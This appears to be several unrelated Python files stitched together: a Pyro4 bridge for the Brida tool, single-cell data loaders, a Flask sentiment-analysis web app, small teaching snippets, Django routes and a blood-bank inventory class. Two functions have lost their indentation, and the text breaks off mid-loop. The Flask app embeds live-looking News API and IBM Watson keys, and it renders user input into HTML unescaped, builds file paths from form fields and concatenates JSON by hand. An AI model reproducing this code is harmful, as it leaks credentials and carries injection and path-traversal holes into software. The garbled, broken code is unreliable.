    def __getattr__(self, attr):
        return getattr(self.stream, attr)
def path_import(absolute_path):
    """Load and return a Python module directly from a file path."""
    loaded_spec = importlib.util.spec_from_file_location(absolute_path, absolute_path)
    loaded_module = importlib.util.module_from_spec(loaded_spec)
    loaded_spec.loader.exec_module(loaded_module)
    return loaded_module
@Pyro4.expose
class BridaServicePyro:
    """Pyro4-exposed bridge that lets the Java side call functions from a user script."""

    def __init__(self, daemon, pyfile):
        # Make sibling modules of the user script importable before loading it.
        sys.path.append(os.path.dirname(pyfile))
        self.daemon = daemon
        self.pyfile = pyfile
        self.script = path_import(self.pyfile)

    def callexportfunction(self, methodName, args):
        """Look up `methodName` on the loaded script and call it with `args`."""
        exported = getattr(self.script, methodName)
        # Copy the Java-provided list into a native Python list before
        # unpacking (needed by the Python/Java bridge).
        native_args = [item for item in args]
        return exported(*native_args)

    @Pyro4.oneway
    def shutdown(self):
        print('shutting down...')
        self.daemon.shutdown()
# Disable python buffering (cause issues when communicating with Java...)
sys.stdout = Unbuffered(sys.stdout)
sys.stderr = Unbuffered(sys.stderr)
# Usage: script.py <host> <port> <user-script.py>
host = sys.argv[1]
port = int(sys.argv[2])
daemon = Pyro4.Daemon(host=host, port=port)
# daemon = Pyro4.Daemon(host='127.0.0.1',port=9999)
bs = BridaServicePyro(daemon, sys.argv[3])
uri = daemon.register(bs, objectId='BridaServicePyro')
print("Ready.")
# Blocks serving requests until shutdown() is invoked remotely.
daemon.requestLoop()
|
import gzip
import numpy as np
import os.path
import scipy.sparse
from scipy.sparse import csr_matrix
from sklearn.preprocessing import normalize
import sys
from scanorama import merge_datasets
MIN_TRANSCRIPTS = 600
def load_tab(fname, max_genes=40000):
    """Load a dense tab-delimited expression table (optionally gzipped).

    The first line is a header: a label followed by cell names; each
    following line is a gene name followed by one value per cell.

    Returns (X, cells, genes) where X has shape (n_cells, n_genes).
    """
    if fname.endswith('.gz'):
        opener = gzip.open
    else:
        opener = open
    with opener(fname, 'r') as f:
        if fname.endswith('.gz'):
            header = f.readline().decode('utf-8').rstrip().split('\t')
        else:
            header = f.readline().rstrip().split('\t')
        cells = header[1:]
        X = np.zeros((len(cells), max_genes))
        genes = []
        for i, line in enumerate(f):
            # Fix: the original tested `i > max_genes`, which let i reach
            # max_genes and index one column past the end of X (IndexError)
            # on files with more than max_genes genes.
            if i >= max_genes:
                break
            if fname.endswith('.gz'):
                line = line.decode('utf-8')
            fields = line.rstrip().split('\t')
            genes.append(fields[0])
            # Renamed the comprehension variable: it shadowed the file handle f.
            X[:, i] = [ float(field) for field in fields[1:] ]
    return X[:, range(len(genes))], np.array(cells), np.array(genes)
def load_mtx(dname):
    """Read a 10x-style directory (matrix.mtx + genes.tsv).

    Returns (X, genes) with X sparse of shape (n_cells, n_genes).
    """
    with open(dname + '/matrix.mtx', 'r') as handle:
        # Skip '%'-prefixed comment lines; the first real line holds the sizes.
        while True:
            header = handle.readline()
            if not header.startswith('%'):
                break
        header = header.rstrip().split()
        n_genes, n_cells = int(header[0]), int(header[1])
        values, rows, cols = [], [], []
        for entry in handle:
            fields = entry.rstrip().split()
            # Entries are 1-based "gene cell value"; store cells as rows.
            values.append(float(fields[2]))
            rows.append(int(fields[1]) - 1)
            cols.append(int(fields[0]) - 1)
    X = csr_matrix((values, (rows, cols)), shape=(n_cells, n_genes))
    genes = []
    with open(dname + '/genes.tsv', 'r') as handle:
        for entry in handle:
            # Second column of genes.tsv is the gene symbol.
            genes.append(entry.rstrip().split()[1])
    assert(len(genes) == n_genes)
    return X, np.array(genes)
def load_h5(fname, genome='mm10'):
    """Load a 10x Genomics .h5 expression matrix for the given genome group.

    Returns (X, genes) with X sparse of shape (n_cells, n_genes).
    Requires the optional PyTables dependency; exits with a message if absent.
    """
    try:
        import tables
    except ImportError:
        sys.stderr.write('Please install PyTables to read .h5 files: '
                         'https://www.pytables.org/usersguide/installation.html\n')
        exit(1)
    # Adapted from scanpy's read_10x_h5() method.
    with tables.open_file(str(fname), 'r') as f:
        try:
            dsets = {}
            for node in f.walk_nodes('/' + genome, 'Array'):
                dsets[node.name] = node.read()
            n_genes, n_cells = dsets['shape']
            data = dsets['data']
            # Reinterpret int32 counts as a float32 buffer in place, then
            # copy the integer values over so the CSR matrix holds floats
            # without an extra allocation.
            if dsets['data'].dtype == np.dtype('int32'):
                data = dsets['data'].view('float32')
                data[:] = dsets['data']
            X = csr_matrix((data, dsets['indices'], dsets['indptr']),
                           shape=(n_cells, n_genes))
            genes = [ gene for gene in dsets['genes'].astype(str) ]
            assert(len(genes) == n_genes)
            assert(len(genes) == X.shape[1])
        except tables.NoSuchNodeError:
            raise Exception('Genome %s does not exist in this file.' % genome)
        except KeyError:
            raise Exception('File is missing one or more required datasets.')
    return X, np.array(genes)
def process_tab(fname, min_trans=MIN_TRANSCRIPTS):
    """Load a tab file, drop low-coverage cells, and cache the result as .npz."""
    X, cells, genes = load_tab(fname)
    # Keep only cells expressing at least min_trans genes.
    keep = [ idx for idx, count in enumerate(np.sum(X != 0, axis=1))
             if count >= min_trans ]
    X = X[keep, :]
    cells = cells[keep]
    if not keep:
        print('Warning: 0 cells passed QC in {}'.format(fname))
    # Derive the cache name by stripping the (possibly gzipped) extension.
    for suffix, n_parts in (('.txt.gz', 2), ('.tsv.gz', 2), ('.txt', 1), ('.tsv', 1)):
        if fname.endswith(suffix):
            cache_prefix = '.'.join(fname.split('.')[:-n_parts])
            break
    else:
        sys.stderr.write('Tab files should end with ".txt" or ".tsv"\n')
        exit(1)
    np.savez(cache_prefix + '.npz', X=X, genes=genes)
    return X, cells, genes
def process_mtx(dname, min_trans=MIN_TRANSCRIPTS):
    """Load an mtx directory, drop low-coverage cells, and cache X plus gene names."""
    X, genes = load_mtx(dname)
    # Keep only cells expressing at least min_trans genes.
    keep = [ idx for idx, count in enumerate(np.sum(X != 0, axis=1))
             if count >= min_trans ]
    X = X[keep, :]
    if not keep:
        print('Warning: 0 cells passed QC in {}'.format(dname))
    scipy.sparse.save_npz(dname + '/tab.npz', X, compressed=False)
    with open(dname + '/tab.genes.txt', 'w') as of:
        of.write('\n'.join(genes) + '\n')
    return X, genes
def process_h5(fname, min_trans=MIN_TRANSCRIPTS):
    """Load a 10x .h5 file, drop low-coverage cells, and cache the result.

    Fix: the original only assigned cache_prefix inside `if
    fname.endswith('.h5')`, so any other name crashed later with a
    NameError; it now fails fast with a clear message, matching
    process_tab's behavior for bad extensions.
    """
    if not fname.endswith('.h5'):
        sys.stderr.write('HDF5 files should end with ".h5"\n')
        exit(1)
    X, genes = load_h5(fname)
    # Keep only cells expressing at least min_trans genes.
    gt_idx = [ i for i, s in enumerate(np.sum(X != 0, axis=1))
               if s >= min_trans ]
    X = X[gt_idx, :]
    if len(gt_idx) == 0:
        print('Warning: 0 cells passed QC in {}'.format(fname))
    cache_prefix = '.'.join(fname.split('.')[:-1])
    scipy.sparse.save_npz(cache_prefix + '.h5.npz', X, compressed=False)
    with open(cache_prefix + '.h5.genes.txt', 'w') as of:
        of.write('\n'.join(genes) + '\n')
    return X, genes
def load_data(name):
    """Load a cached dataset by name, trying .h5.npz, .npz, then <dir>/tab.npz.

    Returns (X, genes) with gene names upper-cased.
    """
    if os.path.isfile(name + '.h5.npz'):
        X = scipy.sparse.load_npz(name + '.h5.npz')
        with open(name + '.h5.genes.txt') as handle:
            genes = handle.read().rstrip().split()
    elif os.path.isfile(name + '.npz'):
        archive = np.load(name + '.npz')
        X = archive['X']
        genes = archive['genes']
        archive.close()
    elif os.path.isfile(name + '/tab.npz'):
        X = scipy.sparse.load_npz(name + '/tab.npz')
        with open(name + '/tab.genes.txt') as handle:
            genes = handle.read().rstrip().split()
    else:
        sys.stderr.write('Could not find: {}\n'.format(name))
        exit(1)
    # Normalize gene symbols to upper case across datasets.
    return X, np.array([ gene.upper() for gene in genes ])
def load_names(data_names, norm=True, log1p=False, verbose=True):
    """Load every named dataset, optionally L2-normalizing and log1p-transforming.

    Returns (datasets, genes_list, n_cells) where each dataset is a CSR matrix.
    """
    datasets = []
    genes_list = []
    n_cells = 0
    for name in data_names:
        matrix, gene_names = load_data(name)
        if norm:
            # Scale each cell (row) to unit L2 norm.
            matrix = normalize(matrix, axis=1)
        if log1p:
            matrix = np.log1p(matrix)
        matrix = csr_matrix(matrix)
        datasets.append(matrix)
        genes_list.append(gene_names)
        n_cells += matrix.shape[0]
        if verbose:
            print('Loaded {} with {} genes and {} cells'.
                  format(name, matrix.shape[1], matrix.shape[0]))
    if verbose:
        print('Found {} cells among all datasets'
              .format(n_cells))
    return datasets, genes_list, n_cells
def save_datasets(datasets, genes, data_names, verbose=True,
                  truncate_neg=False):
    """Write each corrected dataset as a genes-by-cells tab-delimited text file."""
    for dataset, name in zip(datasets, data_names):
        dense = dataset.toarray()
        if truncate_neg:
            # Clamp negative corrected expression values to zero.
            dense[dense < 0] = 0
        n_cells, n_genes = dense.shape
        with open(name + '.scanorama_corrected.txt', 'w') as of:
            # Header row: 'Genes' followed by synthetic cell names.
            of.write('Genes\t')
            of.write('\t'.join(
                [ 'cell' + str(cell) for cell in range(n_cells) ]
            ) + '\n')
            # One row per gene containing its value in every cell.
            for g in range(n_genes):
                of.write(genes[g] + '\t')
                of.write('\t'.join(
                    [ str(expr) for expr in dense[:, g] ]
                ) + '\n')
def process(data_names, min_trans=MIN_TRANSCRIPTS):
    """Dispatch each dataset name to the right loader (mtx dir, .h5, or tab file)."""
    for name in data_names:
        if os.path.isdir(name):
            process_mtx(name, min_trans=min_trans)
        elif os.path.isfile(name) and name.endswith('.h5'):
            process_h5(name, min_trans=min_trans)
        elif os.path.isfile(name + '.h5'):
            process_h5(name + '.h5', min_trans=min_trans)
        elif os.path.isfile(name):
            process_tab(name, min_trans=min_trans)
        else:
            # Try the known tab-file extensions in order.
            for ext in ('.txt', '.txt.gz', '.tsv', '.tsv.gz'):
                if os.path.isfile(name + ext):
                    process_tab(name + ext, min_trans=min_trans)
                    break
            else:
                sys.stderr.write('Warning: Could not find {}\n'.format(name))
                continue
        print('Successfully processed {}'.format(name))
if __name__ == '__main__':
    # Process every dataset listed in the project config.
    from config import data_names
    process(data_names)
|
from flask import Flask, render_template, url_for, request
import requests
import math
import ktrain
import numpy as np
#from sklearn.metrics import confusion_matrix
#from sklearn.metrics import f1_score
#from sklearn.metrics import accuracy_score
from ktrain import text
from tensorflow import keras
#import pickle
import os
#os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID";
#os.environ["CUDA_VISIBLE_DEVICES"]="0";
import sys
#from nltk.tokenize import sent_tokenize
import spacy
import pytextrank
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
#y_pred = predictor.predict("India must join hands with Central Asia for peace in Afghanistan")
#print(y_pred)
app = Flask(__name__)

# Which sentiment model to serve, chosen on the command line.
modelno = int(sys.argv[1])
#modelno 1 -> NB-SVM
#modelno 2 -> bert language model
#modelno 3 -> mLSTM
#modelno 4 -> mLSTM (originally trained); any other value falls back to
#             VADER-only scoring in getPrediction()
#Load Model
predictor = None
if modelno == 1:
    predictor = ktrain.load_predictor('models/predictorNBSVM')
elif modelno == 2:
    predictor = ktrain.load_predictor('models/predictorDistilBert')
elif modelno == 3:
    predictor = ktrain.load_predictor('models/predictorMLSTM')
else:
    pass
def color(score, pred):
    """Map a sentiment score and predicted class to an "(r, g, b)" string.

    The class picks the channel ('0' -> red, '1' -> blue, else green) and
    the score is mapped linearly over the class's score range so stronger
    scores give darker shades (255 down to 120).
    """
    # https://stackoverflow.com/questions/5731863/mapping-a-numeric-range-onto-another
    def shade(low, high):
        gradient = -(255.0 - 120.0) / (high - low)
        return int(255.0 + gradient * (score - low))

    red = green = blue = 0
    if pred == '0':      # negative sentiment -> red channel
        red = shade(0.05, 1.0)
    elif pred == '1':    # neutral sentiment -> blue channel
        blue = shade(-0.05, 0.05)
    else:                # positive sentiment -> green channel
        green = shade(0.05, 1.0)
    return str((red, green, blue))
def getPrediction(chunk):
    """Classify a text chunk's sentiment.

    Returns (label, strength): label is '0' (negative), '1' (neutral) or
    '2' (positive); strength is the absolute VADER compound score. For
    modelno 1-3 the label comes from the loaded ktrain predictor,
    otherwise from VADER's +/-0.05 compound thresholds.
    """
    #return predictor.predict(chunk)
    sid = SentimentIntensityAnalyzer()
    scores = sid.polarity_scores(chunk)
    #print(scores)
    if modelno == 1 or modelno ==2 or modelno == 3:
        return predictor.predict(chunk), abs(scores['compound'])
    if scores['compound'] >= 0.05:
        return '2', abs(scores['compound'])
    elif scores['compound'] >= -0.05:
        return '1', abs(scores['compound'])
    else:
        return '0', abs(scores['compound'])
#text to sentences, simple !!!
def breakIntoSentences(incoming):
    """Naively split text on '.' and re-append a period to every piece.

    Note this intentionally mirrors the original behavior: a trailing '.'
    in the input yields a final "." piece.
    """
    return [piece + '.' for piece in incoming.split('.')]
#return sent_tokenize(incoming);
def breakIntoWordsAndPhrases(text):
    """Split text into chunks at the boundaries of key phrases.

    Uses spaCy + pytextrank to extract ranked noun phrases, then walks the
    text once, emitting accumulated plain text and each phrase as separate
    chunks (original order preserved).
    """
    nlp = spacy.load("en_core_web_sm")
    tr = pytextrank.TextRank()
    nlp.add_pipe(tr.PipelineComponent, name="textrank", last=True)
    doc = nlp(text)
    hashset = set()
    for p in doc._.phrases:
        for q in p.chunks:
            hashset.add(str(q))
    # Map the first occurrence index of each phrase to the phrase itself.
    # NOTE(review): text.find only locates the first occurrence; repeated
    # phrases later in the text are emitted as plain text.
    indextophrases = {}
    for s in hashset:
        indextophrases[text.find(s)] = s
    i = 0
    end = len(text)
    chunks = []
    string = ""
    while i < end:
        if i in indextophrases:
            # Flush accumulated plain text, then emit the phrase and skip it.
            chunks.append(string)
            chunks.append(indextophrases[i])
            i += len(indextophrases[i])
            string = ""
        else:
            string += text[i]
            i += 1
    if i==end: chunks.append(string)
    return chunks
#text to chunks, based on words, phrases and zero shot classifier
def breakIntoChunks(text):
chunks = breakIntoWordsAndPhrases(text)
#now our chunks are ready based on words and phrases
#now we would be breaking into meaningful chunks using zeroshotclassifier
meaningfulchunks = []
i = 0
end = len(chunks)
labelprev = -1
labelcurr = -1
stringprev = ""
stringcurr = ""
score = 0.0
prevscore = 0.0
while i< end:
if i==0:
labelcurr, score = getPrediction(chunks[i])#predictor.predict(chunks[i])
stringcurr = chunks[i]
else:
labelcurr, score = getPrediction(stringprev + chunks[i])#predictor.predict(chunks[i])
stringcurr = stringprev + chunks[i]
if labelcurr != labelprev or score < prevscore:
meaningfulchunks.append(stringprev)
stringcurr = chunks[i]
#labelcurr = predictor.predict(chunks[i])
labelprev = labelcurr
stringprev = stringcurr
prevscore = score
i += 1
if i == end: meaningfulchunks.append(stringprev)
return meaningfulchunks
def buildTextToPrint(sentences):
    """Render each chunk as an HTML <font> span colored by its sentiment.

    Fix: the original branched on the predicted label ('0' / '1' / else)
    but all three branches emitted exactly the same markup; the redundant
    branch is collapsed -- color() already varies the channel per label.
    """
    texttoprint = ''
    for sentence in sentences:
        ypred, score = getPrediction(sentence)
        texttoprint += ('<font style = "font-family: Times New Roman; text-align: justify; font-size:25px; color: rgb'
                        + color(score, ypred) + '">' + sentence + '</font>')
    return texttoprint
# --- Static page routes: each simply renders its template. ---
@app.route('/')
def index():
    return render_template('index.html')

@app.route('/home')
def home():
    # Same landing page as '/'.
    return render_template('index.html')

@app.route('/about')
def about():
    return render_template('about.html')

@app.route('/contact')
def contact():
    return render_template('contact.html')

@app.route('/readEnglish', methods=['GET', 'POST'])
def readEnglish():
    return render_template('readEnglish.html')

@app.route('/readUrdu', methods=['GET', 'POST'])
def readUrdu():
    return render_template('readUrdu.html')

@app.route('/menuEnglish', methods=['GET', 'POST'])
def menuEnglish():
    return render_template('menuEnglish.html')
@app.route('/showExample', methods=['GET', 'POST'])
def showExample():
    """Load a bundled article ("<category> <number>") and render it annotated."""
    incoming = request.form['showExampleNumber'];
    incoming = incoming.split(' ');
    text = ""
    texttoprint = ""
    # Articles live under news/<category>/<number>.txt
    fname = 'news/' + incoming[0] + '/'+ incoming[1]+'.txt'
    #f = open(fname, "r")
    #text = bytes(f.read(), 'utf-8').decode('utf-8', 'ignore')
    with open(fname, encoding="latin-1") as ff:
        text = ff.read()
    sentences = breakIntoChunks(text)
    texttoprint = '<div id="anim">'
    texttoprint += buildTextToPrint(sentences)
    texttoprint += '</div>'
    return render_template('showEnglish.html', pred=texttoprint)
@app.route('/exampleEnglish', methods=['GET', 'POST'])
def exampleEnglish():
    # Map the chosen example name to its pre-rendered template;
    # anything unrecognized falls through to the Kashmir example.
    incoming = request.form['exampleEnglish'];
    if(incoming == 'Demo'):
        return render_template('demo.html')
    if(incoming == 'Army'):
        return render_template('army.html')
    if(incoming == 'Isro'):
        return render_template('isro.html')
    if(incoming == 'India'):
        return render_template('india.html')
    if(incoming == 'Drdo'):
        return render_template('drdo.html')
    return render_template('kashmir.html')

@app.route('/exampleUrdu', methods=['GET', 'POST'])
def exampleUrdu():
    return render_template('exampleUrdu.html')

@app.route('/goLive', methods=['GET', 'POST'])
def goLive():
    return render_template('goLive.html')
@app.route('/goLiveShow', methods=['GET', 'POST'])
def goLiveShow():
    """Fetch headlines for a keyword and render up to 10, sentiment-annotated."""
    incoming = request.form['keyword'];
    query = 'q='
    query = query + incoming + '&'
    # SECURITY NOTE(review): the News API key is hard-coded in source;
    # move it to configuration/environment.
    url = ('http://newsapi.org/v2/everything?'+
           query+
           'from=2020-06-25&'
           'sortBy=popularity&'
           'apiKey=9b101bf919c24b0a8aea24a66ab1e1fc')
    response = requests.get(url)
    length = len(response.json()['articles'])
    string = '<div id="anim">'
    for i in range(min(10, length)):
        string += buildTextToPrint(breakIntoChunks(response.json()['articles'][i]['title']))
        string += '<br/>'
    string += '</div>'
    return render_template('goLiveShow.html', data = string)
@app.route('/showEnglish', methods=['GET', 'POST'])
def showEnglish():
    """Annotate submitted English text; the dropdown picks the chunking strategy."""
    incoming = request.form['newsArticle'];
    dropdown = request.form['dropdown'];
    incoming = incoming.strip()
    sentences = []
    # -1/3 -> classifier-driven chunks, 1 -> sentences, 2 -> words/phrases.
    if dropdown == "-1" or dropdown == "3":
        sentences = breakIntoChunks(incoming)
    elif dropdown == "1":
        sentences = breakIntoSentences(incoming)
    elif dropdown == "2":
        sentences = breakIntoWordsAndPhrases(incoming)
    texttoprint = '<div id="anim">'
    texttoprint += buildTextToPrint(sentences)
    texttoprint += '</div>'
    #print(texttoprint)
    return render_template('showEnglish.html', pred=texttoprint)
@app.route('/showUrdu', methods=['GET', 'POST'])
def showUrdu():
    """Translate submitted Urdu text to English via IBM Watson, then annotate it."""
    urdutext = request.form['urduArticle'];
    urdutext = urdutext.strip()
    # Collapse the input to a single line before building the JSON payload.
    urdutext = [st.strip() for st in urdutext.splitlines()]
    urdutext = ' '.join(urdutext)
    headers = {'Content-Type': 'application/json; charset=utf-8',}
    params = (('version', '2018-05-01'),)
    # SECURITY NOTE(review): the Watson API key and instance URL are
    # hard-coded in source; move them to configuration/environment.
    data = '{"text": ["'+urdutext+'"], "model_id":"ur-en"}'
    response = requests.post('https://api.eu-gb.language-translator.watson.cloud.ibm.com/instances/33ae3fe4-df2e-4769-a2da-9b6f6433946f/v3/translate?version=2018-05-01', headers=headers, data=data.encode('utf-8'), auth=('apikey', 'Ygir-J0aZEpK6fava68HuLjpwpVPAUVycztQzfsPtP-N'))
    if 'translations' in response.json().keys():
        incoming = response.json()['translations'][0]['translation']
        incoming = incoming.rstrip()
        incoming = incoming.lstrip()
        sentences = breakIntoChunks(incoming)
        texttoprint = '<div id="anim">'
        texttoprint += buildTextToPrint(sentences)
        texttoprint += '</div>'
        #print(urdutext+"<br/><br/>"+texttoprint)
        return render_template('showUrdu.html', pred=urdutext+"<br/><br/>"+texttoprint)
    else:
        # Translation failed (e.g. quota or malformed input).
        return render_template('showUrdu.html', pred=urdutext+"<br/><br/>"+"Invalid input")
if __name__=="__main__":
    # Run the Flask development server.
    app.run()
|
# Demo of Python variable scoping (global vs local bindings).
l=10 # Global variable: visible to any function in this module
m=20 # Global variable: visible to any function in this module
def function1():
    l=5 #local variable: only this function sees this binding
    n=10 #local variable: only this function sees this binding
    print(l,m,n)
    '''here l is 5 so it can not take the value of global variable it but here m is not defined in this
function so it take the value of global variable'''
function1()
print(l,m) # prints the globals: the local l inside function1 did not change them
from nine import str
from PyFlow.UI.Tool.Tool import ShelfTool
from PyFlow.Packages.Maya.Tools import RESOURCES_DIR
from Qt import QtGui
class RunScriptTool(ShelfTool):
    """Shelf tool that finds every scriptEntry node in the graph and runs it."""

    def __init__(self):
        super(RunScriptTool, self).__init__()

    @staticmethod
    def toolTip():
        return "Finds all scriptEntry nodes and executes them"

    @staticmethod
    def getIcon():
        # Icon shipped in the package's resources directory.
        return QtGui.QIcon(RESOURCES_DIR + "runScript.png")

    @staticmethod
    def name():
        return str("RunScriptTool")

    def do(self):
        # Execute every scriptEntry node in the currently open graph.
        entryPointNodes = self.pyFlowInstance.graphManager.get().getAllNodes(classNameFilters=["scriptEntry"])
        for entryNode in entryPointNodes:
            entryNode.compute()
|
from helper import build_tree
from helper import print_tree
def mirror_tree(root):
    """Mirror a binary tree in place by swapping children at every node."""
    def _mirror(node):
        # Pre-order swap: exchange the children, then descend into both
        # (equivalent result to the post-order formulation).
        if node is None:
            return
        node.left, node.right = node.right, node.left
        _mirror(node.left)
        _mirror(node.right)
    return _mirror(root)
if __name__ == '__main__':
    # Build a sample tree ('#' marks a missing child), print it, mirror it,
    # and print the result.  NOTE: the bare `print` is Python 2 syntax for
    # printing a blank line.
    tree = build_tree([20, 50, 200, 25, 75, '#', 300])
    print_tree(tree)
    print
    mirror_tree(tree)
    print_tree(tree)
|
from django.urls import path
from django.conf.urls import url, include
from django.contrib import admin
from django.contrib.auth import views
#from django.contrib.auth.views import login
from . import views
# URL routes for the reviews app: class-based views for the review pages,
# function views for auth.
urlpatterns = [
    #path('', views.index, name='index'),
    path('review/', views.ReviewView.as_view(), name='review'),
    path('manage/', views.Manage.as_view(), name='manage'),
    path('', views.allReviews.as_view(), name='all-review'),
    #path('map/', views.map, name='map'), Now in all-review
    url(r'^login/$', views.Home, name='login'),
    url(r'^account/logout/$', views.Logout, name='logout'),
]
|
import json
from datetime import datetime
class BECS:
    """Blood Establishment Computer System: tracks cooled and frozen blood packs."""

    # For each recipient blood type, the donor types that are compatible.
    possibleDonors = {
        'A+': ['A+', 'A-', 'O+', 'O-'],
        'O+': ['O+', 'O-'],
        'B+': ['B+', 'B-', 'O+', 'O-'],
        'AB+': ['O+', 'A+', 'B+', 'AB+', 'O-', 'A-', 'B-', 'AB-'],
        'A-': ['A-', 'O-'],
        'O-': ['O-'],
        'B-': ['B-', 'O-'],
        'AB-': ['O-', 'A-', 'B-', 'AB-']
    }
    # Relative weight of each blood type used for suitability scoring
    # (presumably the population share in percent -- confirm source).
    bloodTypeDistribution = {
        'A+': 34,
        'O+': 32,
        'B+': 17,
        'AB+': 7,
        'A-': 4,
        'O-': 3,
        'B-': 2,
        'AB-': 1
    }
def findLastFrozenID(self, frozen):
    """Return the next free pack ID for the frozen store.

    Fix: the original returned "last key seen during iteration" + 1, which
    depends on dict insertion order; the maximum numeric key is correct
    regardless of ordering. An empty store still yields 1.
    """
    ids = [int(packID) for packID in frozen.keys()]
    return (max(ids) if ids else 0) + 1
def findLastCooledID(self, cooled):
    """Return the next free pack ID for the cooled store.

    Fix: the original returned "last key seen during iteration" + 1, which
    depends on dict insertion order; the maximum numeric key is correct
    regardless of ordering. An empty store still yields 1.
    """
    ids = [int(packID) for packID in cooled.keys()]
    return (max(ids) if ids else 0) + 1
def getMostSuitableDonorsFromFrozen(self):
    """Rank blood types by (distribution weight * frozen stock), descending.

    Reads pack counts from api/data/counts.json and returns a list of
    (blood_type, suitability_score) tuples sorted high to low.
    """
    suitability = []
    with open("api/data/counts.json", "r") as counts:
        data = json.load(counts)
    # NOTE(review): assumes the "frozen" keys in counts.json are stored in
    # the same order as bloodTypeDistribution -- confirm the file layout.
    for i in range(8):
        bTypes = [x for x in self.bloodTypeDistribution.keys()]
        bCounts = [x for x in data["frozen"].values()]
        distributions = [x for x in self.bloodTypeDistribution.values()]
        suitability.append((
            bTypes[i],
            distributions[i] * bCounts[i]
        ))
    suitability = sorted(suitability, key=lambda x:x[1], reverse=True)
    return suitability
def getMostSuitableDonorsFromCooled(self):
    """Rank blood types by (distribution weight * cooled stock), descending.

    Reads pack counts from api/data/counts.json and returns a list of
    (blood_type, suitability_score) tuples sorted high to low.
    """
    suitability = []
    with open("api/data/counts.json", "r") as counts:
        data = json.load(counts)
    # NOTE(review): assumes the "cooled" keys in counts.json are stored in
    # the same order as bloodTypeDistribution -- confirm the file layout.
    for i in range(8):
        bTypes = [x for x in self.bloodTypeDistribution.keys()]
        bCounts = [x for x in data["cooled"].values()]
        distributions = [x for x in self.bloodTypeDistribution.values()]
        suitability.append((
            bTypes[i],
            distributions[i] * bCounts[i]
        ))
    suitability = sorted(suitability, key=lambda x:x[1], reverse=True)
    return suitability
def addNewPortion(self, bloodType):
    """Register a newly donated pack of `bloodType` in the cooled store.

    Increments the cooled count, records the pack with today's date, and
    persists both JSON files. Returns (bloodType, new_cooled_count).
    """
    with open("api/data/counts.json", "r") as counts:
        cnts = json.load(counts)
    with open("api/data/cooledPacks.json", "r") as cooled:
        cld = json.load(cooled)
    cnts["cooled"][bloodType] += 1
    # NOTE(review): findLastCooledID returns an int while the existing JSON
    # keys are strings; json.dump stringifies int keys on write, so the
    # stored file stays consistent -- but the in-memory dict briefly mixes
    # key types.
    cld[self.findLastCooledID(cld)] = {
        "type": bloodType,
        "added_on": datetime.today().date().strftime("%d-%m-%Y")
    }
    with open("api/data/counts.json", "w") as packs:
        json.dump(cnts, packs)
    with open("api/data/cooledPacks.json", "w") as packs:
        json.dump(cld, packs)
    return (bloodType, cnts["cooled"][bloodType])
def withdrawPortion(self, bloodType, urgency):
with open("api/data/counts.json", "r") as counts:
cnts = json.load(counts)
if urgency == "reg":
#first check frozen
sortedList = self.getMostSuitableDonorsFromFrozen()
donorsList = self.possibleDonors[bloodType]
sortedDonors = []
for i in sortedList:
if i[0] in donorsList:
sortedDonors.append(i)
sortedDonors.sort(key=lambda tup: tup[1], reverse=True)
chosenBloodType = sortedDonors[0][0]
print(" RESULTS OF PULLING REGULAR:")
print(sortedList)
print(sortedDonors)
print(chosenBloodType)
if cnts["frozen"][chosenBloodType] > 0:
#Remove first found pack of this blood type
with open("api/data/frozenPacks.json", "r") as cooled:
frz = json.load(cooled)
for k,v in frz.items():
if v["type"] == chosenBloodType:
del frz[k]
break
with open("api/data/frozenPacks.json", "w") as packs:
json.dump(frz, packs)
#Update pack count
cnts["frozen"][chosenBloodType] -= 1
with open("api/data/counts.json", "w") as packs:
json.dump(cnts, packs)
return (chosenBloodType, cnts["frozen"][chosenBloodType])
else:
#If not found, check cooled
sortedList = self.getMostSuitableDonorsFromCooled()
donorsList = self.possibleDonors[bloodType]
sortedDonors = []
for i in sortedList:
if i[0] in donorsList:
sortedDonors.append(i)
sortedDonors.sort(key=lambda tup: tup[1], reverse=True)
chosenBloodType = sortedDonors[0][0]
if cnts["cooled"][chosenBloodType] > 0:
#Remove first found pack of this blood type
with open("api/data/cooledPacks.json", "r") as cooled:
cld = json.load(cooled)
for k,v in cld.items():
if v["type"] == chosenBloodType:
del cld[k]
break
with open("api/data/cooledPacks.json", "w") as packs:
json.dump(cld, packs)
#Update pack count
cnts["cooled"][chosenBloodType] -= 1
with open("api/data/counts.json", "w") as packs:
json.dump(cnts, packs)
return (chosenBloodType, cnts["cooled"][chosenBloodType])
else:
#If not found, return a message on failed search
return ("None", 0)
else:
#first check cooled
sortedList = self.getMostSuitableDonorsFromCooled()
donorsList = self.possibleDonors[bloodType]
sortedDonors = []
for i in sortedList:
if i[0] in donorsList:
sortedDonors.append(i)
sortedDonors.sort(key=lambda tup: tup[1], reverse=True)
chosenBloodType = sortedDonors[0][0]
if cnts["cooled"][chosenBloodType] > 0:
#Remove first found pack of this blood type
with open("api/data/cooledPacks.json", "r") as cooled:
cld = json.load(cooled)
for k,v in cld.items():
if v["type"] == chosenBloodType:
del cld[k]
break
with open("api/data/cooledPacks.json", "w") as packs:
json.dump(cld, packs)
#Update pack count
cnts["cooled"][chosenBloodType] -= 1
with open("api/data/counts.json", "w") as packs:
json.dump(cnts, packs)
return (chosenBloodType, cnts["cooled"][chosenBloodType])
else:
#If not found, check frozen
sortedList = self.getMostSuitableDonorsFromFrozen()
donorsList = self.possibleDonors[bloodType]
sortedDonors = []
for i in sortedList:
if i[0] in donorsList:
sortedDonors.append(i)
sortedDonors.sort(key=lambda tup: tup[1], reverse=True)
chosenBloodType = sortedDonors[0][0]
if cnts["frozen"][chosenBloodType] > 0:
#Remove first found pack of this blood type
with open("api/data/frozenPacks.json", "r") as cooled:
frz = json.load(cooled)
for k,v in frz.items():
if v["type"] == chosenBloodType:
del frz[k]
break
with open("api/data/frozenPacks.json", "w") as packs:
json.dump(frz, packs)
#Update pack count
cnts["frozen"][chosenBloodType] -= 1
with open("api/data/counts.json", "w") as packs:
json.dump(cnts, packs)
return (chosenBloodType, cnts["frozen"][chosenBloodType])
else:
#If not found, return a message on failed search
return ("None", 0)
def massWithdrawal(self, amounts):
taken = {
'A+': 0,
'O+': 0,
'B+': 0,
'AB+': 0,
'A-': 0,
'O-': 0,
'B-': 0,
'AB-': 0
}
unpulled = {
'A+': amounts[0][1],
'O+': amounts[1][1],
'B+': amounts[2][1],
'AB+': amounts[3][1],
'A-': amounts[4][1],
'O-': amounts[5][1],
'B-': amounts[6][1],
'AB-': amounts[7][1]
}
partial = "False"
for req in amounts:
for i in range(req[1]):
